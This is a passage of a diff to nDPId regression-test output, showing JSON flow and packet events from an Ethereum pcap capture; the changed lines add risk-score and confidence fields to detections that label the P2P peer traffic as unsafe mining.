-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364732,"flow_last_seen":1578508364732,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364732,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1578508364751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364751,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGCIIzJlG0wKgBuHZf3ThkB68VWi0AlqAScSALcgAAAgQFrAQCCAqBHInXItiU5gEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1578508364751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364751,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG84nAqAG4MyZRtN04dl9aLQCWZAevFoAQECya6gAAAQEICiLYlSaBHInX"}
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364682,"flow_last_seen":1578508364752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":479,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1578508364752,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 01970{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1578508364773,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1178,"pkt_l4_len":1144,"ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGASMuzZAAC8R8ro2JKDTwKgBuHZfdl8EeHOhfS8\/VKeU4xriCeJZNmbyiR29m3N42\/uIKvLbiJlgdyaSwrO2BgcDcenrD2C97edthDBouwifboHgE3u3hLHcQi8I2aNx02z5+NzOkszQMNgplhV2V\/wYwtE8G8IvYQ3cAAT5BAv5BAP4TYRPFs69gun3gun3uECCARRJlalZmbRgrccKpmIFHuwcnfCnxRI\/PJfvccahZWq2zhSNF3xN8PFm4Ig97uMj8JcxYkHuXulMILJ8m+Dx+E2E0WGPAYLDUILDULhAQhNvCoDxAncltx4bh9WffZwzBdE\/9xF06wXJo57MMUhoLLSI90CIePrV\/tYmYiKEiyDSrJDYOlCFHmZ3pqDCwfhNhGoMJ6iCdn2Cdn24QH6QBf7Np\/9Y+eiOrugFzIsIhVcNcp\/OYct+34QkqEfvlXbuNfWnoEs1IzwGORRl6zR7xwwZW1+45dnGnJxxFET4TYTAnuIugnZfgnZfuECuDYcQjm3wJMglum1qnPXPBozHysGZ9VxiaJNnx\/kw7dAhqZoxI6CdfBdLdPaGhgI412g7XwrxymiHNjtEpybV+E2Eb+UAtIJO1oJO1rhA0poa9\/bt4+0jT09hYxZaiqxOAEVZVX85K1bHaaj2apLnzPtOIrzfKJurvUFlKLQJKx6TBvhnKvyePnNB3SaoJvhNhKSEZZ+Cdl+Cdl+4QGhplCUf+0AxOYQ0\/JiK92IrqpcWVPF77+npw8uqJp6XsPoEUGJFdkdpzDehQ5oaTj67fZbU0xSOgleTToHaYQj4TYSygMxlgsNQgsNQuEAJaLOKzWf\/o+pIN3tGz2TU0Jj7rRUsEu\/g\/J\/izFMRqT2L21hSkEIu4pwcRIudbxWCEi7R3jpR3Qx72SJ7sDxL+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhNFhtVyCw1CCw1C4QGNRrcySTkrIddsTkghzBE5yaZovlz823kaODYnxRULrhcdtfhDSmheK1rkdzx6MLgmWRkcqk5yLSRXbV7Sa9hv4TYSUZnN9gnQ9gnQ9uECK3QCjct4kYgqQwECFpzDV6FidxjszhMNuNu5KPckeHeVnNGRrmrvdWVqSm7NdhSk\/GBSTMV30P4Rv7pq1hSjo+E2ENL1ESYILzYILzbhAFgxun0r0zdyAC5SZb67xXu\/2hxGmSEaQZz1XosQe6902lrVgE71jlymkTkVmiGnjo+wcj5gGrpBHOVgGl5DUX\/hNhFCeJFKCdl+Cdl+4QPL7djWpmmTz8plIeSEj91S2rY+aeiMQAn6m9zZuLcDbcgnpEzw4Bbj2GboSA\/6fD1Ct0nUU6+rf7UzNqpXAqYL4TYRvYnEBgnZfgnZfuED0pW7OSkAUUx9PeHXwwyf7mqpd70LmGPSseSc9VRhmuql9pusBMDKDEfCCcSaAIW2BnfDoTpS113ylm2TbVhfWhF4WIGA="}
 00898{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1578508364773,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGAF0uzdAAC8R9dE2JKDTwKgBuHZfdl8BYMxaEf6gK86OMmqC0hj8YCjT4Kxyd9QhLNhUWv84IcoZEEM5WLaEl0iNjPoH5MGkDBtHCCGzykqH2IyxlA4UZhPcyDumXz\/v4mlSvZfRB2yOu5AYhwCSwbpUWhfp9lpeKanwAQT49Pjt+E2EdbUsoIIrq4Irq7hAjNB3wOfdUkch\/RymD8COogkRfmtGHDZ3JfVp7qPL0g95b9d6Og4eqk7Oc5yCXUjsPCBRZNV\/OEkCcWVLTRMhqvhNhDb\/yRuCdl+Cdl+4QBkaEptJyzZcwNghsa\/yev+qS1D63n8u0YIQqdir49AX7Q7OxcqumEYHw1gpXkn8\/0NtWmRXiIMnyNsmLKeGv434TYQj3LNggnZggnZguEA4nJBTYkTqav4+upLVWlu+s2ggu8pFBH5psWcuz5eAhJOcvW7tSncGp+spv2HIMW\/j4SK81taE+f1zSPKQGx8uhF4WIGA="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1578508364776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508364776,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc6zkAAEARbFTAqAG40WGPAXZfw1AAiAuoYX\/X5Uw4lffkPNHSCMW6SrDFB88ojJJssa\/u4MiJ7ftgjBcFdVPuw+tvNym45804Q6\/uLh0oQsOr0riQp0FxmC7+mATc88CsFLix8wyPMseFlTK290MHGwkPORWZli5hAQHdBMuEfwAAAYJ2X4J2X8mE0WGPAYLDUICEXhYgYAU="}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1578508364784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364784,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGswg056VswKgBuHZf3SosjczmxQv4NKAS\/ohsIgAAAgQFoAQCCApgPx7\/ItiUTwEDAwc="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1578508364784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364784,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnhDAqAG4NOelbN0qdl\/FC\/g0LI3M54AQEAmIYgAAAQEICiLYlUdgPx7\/"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GKKu\/6qLGwKgBuHZf3SxpEHBBX7euwaAS\/ohj6AAAAgQFoAQCCAo0GJnqItiUTwEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFbPAqAG4v+qixt0sdl9ft67BaRBwQoAQEAmAJwAAAQEICiLYlUg0GJnq"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1578508364789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364789,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGVclSkdz5wKgBuHZf3TlFnUTdn3ylU6AScSDFhwAAAgQFrAQCCAqGNr5sItiVBQEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1578508364789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGSNnAqAG4UpHc+d05dl+ffKVTRZ1E3oAQECxU+wAAAQEICiLYlUqGNr5s"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1578508364817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACgG15goQ5CAwKgBuHZf3TZG9x3QfGwlk6AScSARhwAAAgQFoAQCCApyLMYFItiU0QEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1578508364817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGv6DAqAG4KEOQgN02dl98bCWTRvcd0YAQEAmgwgAAAQEICiLYlWVyLMYF"}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"proto":"Mining.Azure","breed":"Acceptable","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1578508364823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364823,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACYGE48SimxDwKgBuHZf3S4uwDPtE20MrKAS\/ogQ2gAAAgQFrAQCCAqmusMwItiUTwEDAwc="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1578508364823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364823,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+ZbAqAG4EopsQ90udl8TbQysLsAz7oAQECws4QAAAQEICiLYlWmmusMw"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364824,"flow_last_seen":1578508364824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508364824,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1578508364824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508364824,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGhG3AqAG4n8tUH906dl\/csM+rAAAAALAC\/\/\/IeAAAAgQFtAEDAwUBAQgKItiVagAAAAAEAgAA"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1578508364831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508364831,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAOcGbbUSilEcwKgBuHZf3S\/8FjKFFTVZHKASaN8k0QAAAgQFrAQCCApjgYkbItiUTwEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1578508364831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508364831,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFL7AqAG4EopRHN0vdl8VNVkc\/BYyhoAQECyrKAAAAQEICiLYlW9jgYkb"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364832,"flow_last_seen":1578508364832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508364832,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1578508364832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508364832,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGt9PAqAG4ouQdoN07dl+4t7BdAAAAALAC\/\/8\/HwAAAgQFtAEDAwUBAQgKItiVcAAAAAAEAgAA"}
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
